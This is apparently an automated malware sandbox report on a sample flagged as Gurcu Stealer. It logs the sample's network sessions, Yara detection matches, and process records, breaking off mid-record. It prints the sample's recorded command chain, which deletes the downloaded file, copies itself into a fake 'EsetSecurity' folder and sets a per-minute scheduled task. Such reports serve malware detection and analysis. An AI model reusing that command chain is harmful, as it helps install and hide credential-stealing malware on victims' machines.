https://pay.x.com https://sentry.io https://ton-staging.atla.twitter.com https://ton-staging.atla.x.com https://ton-staging.pdxa.twitter.com https://ton-staging.pdxa.x.com https://ton.twitter.com https://ton.x.com https://twitter.com https://upload.twitter.com https://upload.x.com https://www.google-analytics.com https://x.com https://.adtrafficquality.google https://.googlesyndication.com https://.doubleclick.net https://securepubads.g.doubleclick.net https://via.intercom.io https://api.intercom.io https://api.au.intercom.io https://api.e [TRUNCATED] strict-transport-security: max-age=631138519 cross-origin-opener-policy: unsafe-none cross-origin-embedder-policy: unsafe-none x-response-time: 9 x-connection-hash: ae16467818f8c019c2a00da464dc34972b86b6befb25d96c7bd32ddde8a5400d connection: close
2024-12-01 21:52:14 UTC	52	IN	Data Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 78 2e 63 6f 6d 2f 66 31 30 52 6b 4b 36 31 77 4e 3f 31 39 37 3d 30 Data Ascii: Found. Redirecting to https://x.com/f10RkK61wN?197=0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.16	49768	192.0.78.152	443	5204	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-01 21:52:14 UTC	69	OUT	GET /blog?223=0 HTTP/1.1 Host: cyble.com Connection: Keep-Alive
2024-12-01 21:52:16 UTC	766	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Sun, 01 Dec 2024 21:52:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Strict-Transport-Security: max-age=31536000 X-hacker: Want root? Visit join.a8c.com and mention this header. Host-Header: WordPress.com Cache-Control: no-cache cf-edge-cache: cache,platform=wordpress Vary: accept, content-type, cookie X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Referrer-Policy: no-referrer-when-downgrade X-Nitro-Cache: MISS X-Nitro-Disabled-Reason: url not allowed X-Nitro-Disabled: 1 X-Redirect-By: WordPress Location: https://cyble.com/blog/?223=0 X-ac: 2.jfk _atomic_dca MISS Alt-Svc: h3=":443"; ma=86400
2024-12-01 21:52:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
2	192.168.2.16	49770	104.244.42.65	443

Timestamp	Bytes transferred	Direction	Data
2024-12-01 21:52:16 UTC	71	OUT	GET /f10RkK61wN?197=0 HTTP/1.1 Host: x.com Connection: Keep-Alive
2024-12-01 21:52:16 UTC	9060	IN	HTTP/1.1 200 OK date: Sun, 01 Dec 2024 21:52:16 GMT perf: 7402827104 expiry: Tue, 31 Mar 1981 05:00:00 GMT pragma: no-cache server: tsa_b set-cookie: guest_id_marketing=v1%3A173308993652691969; Max-Age=63072000; Expires=Tue, 01 Dec 2026 21:52:16 GMT; Path=/; Domain=.x.com; Secure; SameSite=None set-cookie: guest_id_ads=v1%3A173308993652691969; Max-Age=63072000; Expires=Tue, 01 Dec 2026 21:52:16 GMT; Path=/; Domain=.x.com; Secure; SameSite=None set-cookie: personalization_id="v1_Y/Y78WioUmSBaUXmhAlNQA=="; Max-Age=63072000; Expires=Tue, 01 Dec 2026 21:52:16 GMT; Path=/; Domain=.x.com; Secure; SameSite=None set-cookie: guest_id=v1%3A173308993652691969; Max-Age=63072000; Expires=Tue, 01 Dec 2026 21:52:16 GMT; Path=/; Domain=.x.com; Secure; SameSite=None set-cookie: ct0=; Max-Age=-1733089935; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; Domain=.x.com; Secure; SameSite=Lax content-type: text/html; charset=utf-8 x-powered-by: Express cache-control: no-store, max-age=0 last-modified: Sun, 01 Dec 2024 21:52:16 GMT x-frame-options: DENY x-transaction-id: da52c81cca84b133 x-xss-protection: 0 x-content-type-options: nosniff content-security-policy: connect-src 'self' blob: https://.pscp.tv https://.twimg.com https://.video.pscp.tv https://aa.twitter.com https://aa.x.com https://accounts.google.com/gsi/ https://ads-api.twitter.com https://ads-api.x.com https://api-stream.twitter.com https://api-stream.x.com https://api.twitter.com https://api.x.ai https://api.x.com https://api.x.com https://caps.twitter.com https://caps.x.com https://jf.twitter.com https://jf.x.com https://pay.twitter.com https://pay.x.com https://sentry.io https://ton-staging.atla.twitter.com https://ton-staging.atla.x.com https://ton-staging.pdxa.twitter.com https://ton-staging.pdxa.x.com https://ton.twitter.com https://ton.x.com https://twitter.com https://upload.twitter.com https://upload.x.com https://www.google-analytics.com https://x.com https://.adtrafficquality.google https://.googlesyndication.com https://.doubleclick.net https://securepubads.g.doubleclick.net https://via.intercom.io https://api.intercom.io https://api.au.intercom.io https://api.e [TRUNCATED] strict-transport-security: max-age=631138519 cross-origin-opener-policy: unsafe-none cross-origin-embedder-policy: unsafe-none x-response-time: 8 x-connection-hash: 5dfc23f38d7b2c9433b5d7cc8a12f6e25c8b925acc59f7f17d04403d7b52885b connection: close transfer-encoding: chunked
2024-12-01 21:52:16 UTC	2674	IN	Data Raw: 61 36 36 0d 0a 0a 20 20 20 20 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 78 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 20 75 72 6c 20 3d 20 68 74 74 70 73 3a 2f 2f 74 77 69 74 74 65 72 2e 63 6f 6d 2f 78 2f 6d 69 67 72 61 74 65 3f 74 6f 6b 3d 37 62 32 32 36 35 32 32 33 61 32 32 32 66 36 36 33 31 33 30 35 32 36 62 34 62 33 36 33 31 37 37 34 65 33 66 33 31 33 39 33 37 33 64 33 30 32 32 32 63 32 32 37 34 32 32 33 61 33 31 33 37 33 33 33 33 33 30 33 38 33 39 33 39 33 33 33 36 37 64 34 63 63 33 36 36 64 61 34 36 31 31 64 30 32 35 31 38 61 35 31 64 31 35 34 66 Data Ascii: a66 <!DOCTYPE html> <head> <title>x.com</title> <meta http-equiv="refresh" content="0; url = https://twitter.com/x/migrate?tok=7b2265223a222f663130526b4b3631774e3f3139373d30222c2274223a313733333038393933367d4cc366da4611d02518a51d154f

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.16	49773	192.0.78.152	443	5204	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-01 21:52:17 UTC	46	OUT	GET /blog/?223=0 HTTP/1.1 Host: cyble.com
2024-12-01 21:52:21 UTC	769	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 01 Dec 2024 21:52:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Strict-Transport-Security: max-age=31536000 Vary: Accept-Encoding X-hacker: Want root? Visit join.a8c.com and mention this header. Host-Header: WordPress.com Cache-Control: no-cache cf-edge-cache: cache,platform=wordpress X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Referrer-Policy: no-referrer-when-downgrade X-Nitro-Cache: MISS X-Nitro-Disabled-Reason: url not allowed X-Nitro-Disabled: 1 Link: <https://cyble.com/wp-json/>; rel="https://api.w.org/" Vary: accept, content-type, cookie X-ac: 2.jfk _atomic_dca MISS Alt-Svc: h3=":443"; ma=86400
2024-12-01 21:52:21 UTC	600	IN	Data Raw: 31 31 62 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0a 09 09 3c 73 74 79 6c 65 3e 69 6d 67 3a 69 73 28 5b 73 69 7a 65 73 3d 22 61 75 74 6f Data Ascii: 11bb<!DOCTYPE html><html lang="en-US" prefix="og: https://ogp.me/ns#"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"> <style>img:is([sizes="auto
2024-12-01 21:52:21 UTC	1369	IN	Data Raw: 79 73 69 73 20 7c 20 43 79 62 6c 65 20 42 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 47 65 74 20 74 68 65 20 6c 61 74 65 73 74 20 63 79 62 65 72 73 65 63 75 72 69 74 79 20 69 6e 73 69 67 68 74 73 20 66 72 6f 6d 20 43 79 62 6c 65 20 52 65 73 65 61 72 63 68 20 61 6e 64 20 49 6e 74 65 6c 6c 69 67 65 6e 63 65 20 4c 61 62 73 20 28 43 52 49 4c 29 2e 20 45 78 70 6c 6f 72 65 20 65 78 70 65 72 74 20 62 6c 6f 67 73 20 6f 6e 20 64 61 72 6b 20 77 65 62 20 6d 6f 6e 69 74 6f 72 69 6e 67 2c 20 64 61 74 61 20 62 72 65 61 63 68 65 73 2c 20 61 6e 64 20 6d 61 6c 77 61 72 65 20 61 6e 61 6c 79 73 69 73 20 74 6f 20 65 6e 68 61 6e 63 65 20 79 6f 75 72 20 73 65 63 75 72 69 74 79 2e 22 Data Ascii: ysis \| Cyble Blog</title><meta name="description" content="Get the latest cybersecurity insights from Cyble Research and Intelligence Labs (CRIL). Explore expert blogs on dark web monitoring, data breaches, and malware analysis to enhance your security."
2024-12-01 21:52:21 UTC	1369	IN	Data Raw: 3d 22 6f 67 3a 69 6d 61 67 65 3a 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6d 61 67 65 2f 6a 70 65 67 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 63 61 72 64 22 20 63 6f 6e 74 65 6e 74 3d 22 73 75 6d 6d 61 72 79 5f 6c 61 72 67 65 5f 69 6d 61 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 45 78 70 65 72 74 20 43 79 62 65 72 73 65 63 75 72 69 74 79 20 49 6e 73 69 67 68 74 73 20 41 6e 64 20 41 6e 61 6c 79 73 69 73 20 7c 20 43 79 62 6c 65 20 42 6c 6f 67 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 47 65 74 20 74 68 65 20 6c 61 74 65 73 74 20 63 79 Data Ascii: ="og:image:type" content="image/jpeg" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:title" content="Expert Cybersecurity Insights And Analysis \| Cyble Blog" /><meta name="twitter:description" content="Get the latest cy
2024-12-01 21:52:21 UTC	1369	IN	Data Raw: 3d 27 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 70 72 65 63 6f 6e 6e 65 63 74 27 20 68 72 65 66 3d 27 2f 2f 69 30 2e 77 70 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 70 72 65 63 6f 6e 6e 65 63 74 27 20 68 72 65 66 3d 27 2f 2f 63 30 2e 77 70 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 43 79 62 6c 65 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 79 62 6c 65 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 Data Ascii: ='//www.googletagmanager.com' /><link rel='preconnect' href='//i0.wp.com' /><link rel='preconnect' href='//c0.wp.com' /><link rel="alternate" type="application/rss+xml" title="Cyble » Feed" href="https://cyble.com/feed/" /><link rel="alternate"
2024-12-01 21:52:21 UTC	1369	IN	Data Raw: 22 2c 22 5c 75 64 38 33 63 5c 75 64 64 66 61 5c 75 32 30 30 62 5c 75 64 38 33 63 5c 75 64 64 66 33 22 29 26 26 21 6e 28 65 2c 22 5c 75 64 38 33 63 5c 75 64 66 66 34 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 64 62 34 30 5c 75 64 63 36 32 5c 75 64 62 34 30 5c 75 64 63 36 35 5c 75 64 62 34 30 5c 75 64 63 36 65 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 64 62 34 30 5c 75 64 63 37 66 22 2c 22 5c 75 64 38 33 63 5c 75 64 66 66 34 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 32 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 35 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 65 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 37 66 22 29 3b 63 61 Data Ascii: ","\ud83c\uddfa\u200b\ud83c\uddf3")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");ca
2024-12-01 21:52:21 UTC	1369	IN	Data Raw: 22 2b 66 2e 74 6f 53 74 72 69 6e 67 28 29 2b 22 28 22 2b 5b 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 73 29 2c 75 2e 74 6f 53 74 72 69 6e 67 28 29 2c 70 2e 74 6f 53 74 72 69 6e 67 28 29 5d 2e 6a 6f 69 6e 28 22 2c 22 29 2b 22 29 29 3b 22 2c 72 3d 6e 65 77 20 42 6c 6f 62 28 5b 65 5d 2c 7b 74 79 70 65 3a 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 7d 29 2c 61 3d 6e 65 77 20 57 6f 72 6b 65 72 28 55 52 4c 2e 63 72 65 61 74 65 4f 62 6a 65 63 74 55 52 4c 28 72 29 2c 7b 6e 61 6d 65 3a 22 77 70 54 65 73 74 45 6d 6f 6a 69 53 75 70 70 6f 72 74 73 22 7d 29 3b 72 65 74 75 72 6e 20 76 6f 69 64 28 61 2e 6f 6e 6d 65 73 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d Data Ascii: "+f.toString()+"("+[JSON.stringify(s),u.toString(),p.toString()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)}
2024-12-01 21:52:21 UTC	1369	IN	Data Raw: 27 20 69 64 3d 27 77 70 2d 62 6c 6f 63 6b 2d 6c 69 62 72 61 72 79 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 79 62 6c 65 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 67 75 74 65 6e 62 65 72 67 2f 62 75 69 6c 64 2f 62 6c 6f 63 6b 2d 6c 69 62 72 61 72 79 2f 73 74 79 6c 65 2e 63 73 73 3f 76 65 72 3d 31 39 2e 36 2e 34 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 62 6c 6f 63 6b 2d 6c 69 62 72 61 72 79 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 6a 75 73 74 69 66 79 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 6a 75 73 74 69 66 79 3b 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 Data Ascii: ' id='wp-block-library-css' href='https://cyble.com/wp-content/plugins/gutenberg/build/block-library/style.css?ver=19.6.4' media='all' /><style id='wp-block-library-inline-css'>.has-text-align-justify{text-align:justify;}</style><link rel='stylesheet'
2024-12-01 21:52:21 UTC	1369	IN	Data Raw: 6f 72 2e 69 73 2d 73 74 79 6c 65 2d 77 69 64 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 69 73 2d 73 74 79 6c 65 2d 64 6f 74 73 20 7b 6d 61 78 2d 77 69 64 74 68 3a 20 6e 6f 6e 65 3b 7d 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 68 61 73 2d 32 2d 63 6f 6c 75 6d 6e 73 20 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 3a 66 69 72 73 74 2d 63 68 69 6c 64 20 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 31 30 70 78 3b 7d 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 68 61 73 2d 32 2d 63 6f 6c 75 6d 6e 73 20 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 3a 6c 61 73 74 2d 63 68 69 6c 64 20 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 70 78 3b 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 37 38 32 70 78 29 20 Data Ascii: or.is-style-wide,.wp-block-separator.is-style-dots {max-width: none;}.entry-content .has-2-columns .wp-block-column:first-child {padding-right: 10px;}.entry-content .has-2-columns .wp-block-column:last-child {padding-left: 10px;}@media (max-width: 782px)
2024-12-01 21:52:21 UTC	1369	IN	Data Raw: 68 3a 31 32 30 30 70 78 3b 2d 2d 61 73 74 2d 6e 61 72 72 6f 77 2d 63 6f 6e 74 61 69 6e 65 72 2d 77 69 64 74 68 3a 37 35 30 70 78 3b 2d 2d 61 73 74 2d 62 6c 6f 67 2d 74 69 74 6c 65 2d 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 2d 2d 61 73 74 2d 62 6c 6f 67 2d 6d 65 74 61 2d 77 65 69 67 68 74 3a 69 6e 68 65 72 69 74 3b 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 7d 61 2c 2e 70 61 67 65 2d 74 69 74 6c 65 7b 63 6f 6c 6f 72 3a 23 63 63 30 30 30 30 3b 7d 61 3a 68 6f 76 65 72 2c 61 3a 66 6f 63 75 73 7b 63 6f 6c 6f 72 3a 23 63 63 30 30 30 30 3b 7d 62 6f 64 79 2c 62 75 74 74 6f 6e 2c 69 6e 70 75 74 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 2c 2e 61 73 74 2d 62 75 74 74 6f 6e 2c 2e 61 73 74 2d 63 75 73 74 6f 6d 2d 62 75 74 74 Data Ascii: h:1200px;--ast-narrow-container-width:750px;--ast-blog-title-font-weight:normal;--ast-blog-meta-weight:inherit;}html{font-size:100%;}a,.page-title{color:#cc0000;}a:hover,a:focus{color:#cc0000;}body,button,input,select,textarea,.ast-button,.ast-custom-butt
2024-12-01 21:52:21 UTC	1369	IN	Data Raw: 79 3a 27 50 6f 70 70 69 6e 73 27 2c 73 61 6e 73 2d 73 65 72 69 66 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 33 65 6d 3b 7d 68 34 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 34 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 27 50 6f 70 70 69 6e 73 27 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 68 35 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 35 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 27 50 6f 70 70 69 6e 73 27 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 68 36 Data Ascii: y:'Poppins',sans-serif;line-height:1.3em;}h4,.entry-content h4{font-size:24px;font-size:1.5rem;line-height:1.2em;font-family:'Poppins',sans-serif;}h5,.entry-content h5{font-size:20px;font-size:1.25rem;line-height:1.2em;font-family:'Poppins',sans-serif;}h6

Target ID:	1
Start time:	16:51:35
Start date:	01/12/2024
Path:	C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe"
Imagebase:	0x22e48590000
File size:	501'760 bytes
MD5 hash:	A338043C6B5260DF6B7CE4C4EC3D1B80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 00000001.00000002.1261960413.0000022E4A787000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 00000001.00000002.1261960413.0000022E4A764000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 00000001.00000002.1261960413.0000022E4A761000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 00000001.00000002.1261960413.0000022E4A75B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 00000001.00000002.1261960413.0000022E4A8E6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 00000001.00000002.1261960413.0000022E4A7D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 00000001.00000002.1261960413.0000022E4A831000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 00000001.00000002.1261960413.0000022E4A840000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 00000001.00000002.1261960413.0000022E4A8F8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 00000001.00000002.1261960413.0000022E4A802000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 00000001.00000002.1261960413.0000022E4A75E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 00000001.00000002.1261960413.0000022E4A7D3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 00000001.00000002.1261960413.0000022E4A8FB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 00000001.00000002.1261960413.0000022E4A919000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 00000001.00000002.1261960413.0000022E4A8E3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	16:51:36
Start date:	01/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "tDLozbx48F" /sc MINUTE /tr "C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe" /rl LIMITED /f && DEL /F /S /Q /A "C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe" &&START "" "C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe"
Imagebase:	0x7ff6fd780000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	16:51:36
Start date:	01/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6684c0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	16:51:37
Start date:	01/12/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff6a46d0000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	16:51:37
Start date:	01/12/2024
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping 127.0.0.1
Imagebase:	0x7ff689820000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	16:51:40
Start date:	01/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks /create /tn "tDLozbx48F" /sc MINUTE /tr "C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe" /rl LIMITED /f
Imagebase:	0x7ff6a10a0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	16:51:40
Start date:	01/12/2024
Path:	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe"
Imagebase:	0x1f5fc320000
File size:	501'760 bytes
MD5 hash:	A338043C6B5260DF6B7CE4C4EC3D1B80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000C.00000002.2426367415.000001F580460000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000C.00000002.2426367415.000001F5803A4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000C.00000002.2426367415.000001F580486000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000C.00000002.2426367415.000001F580531000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 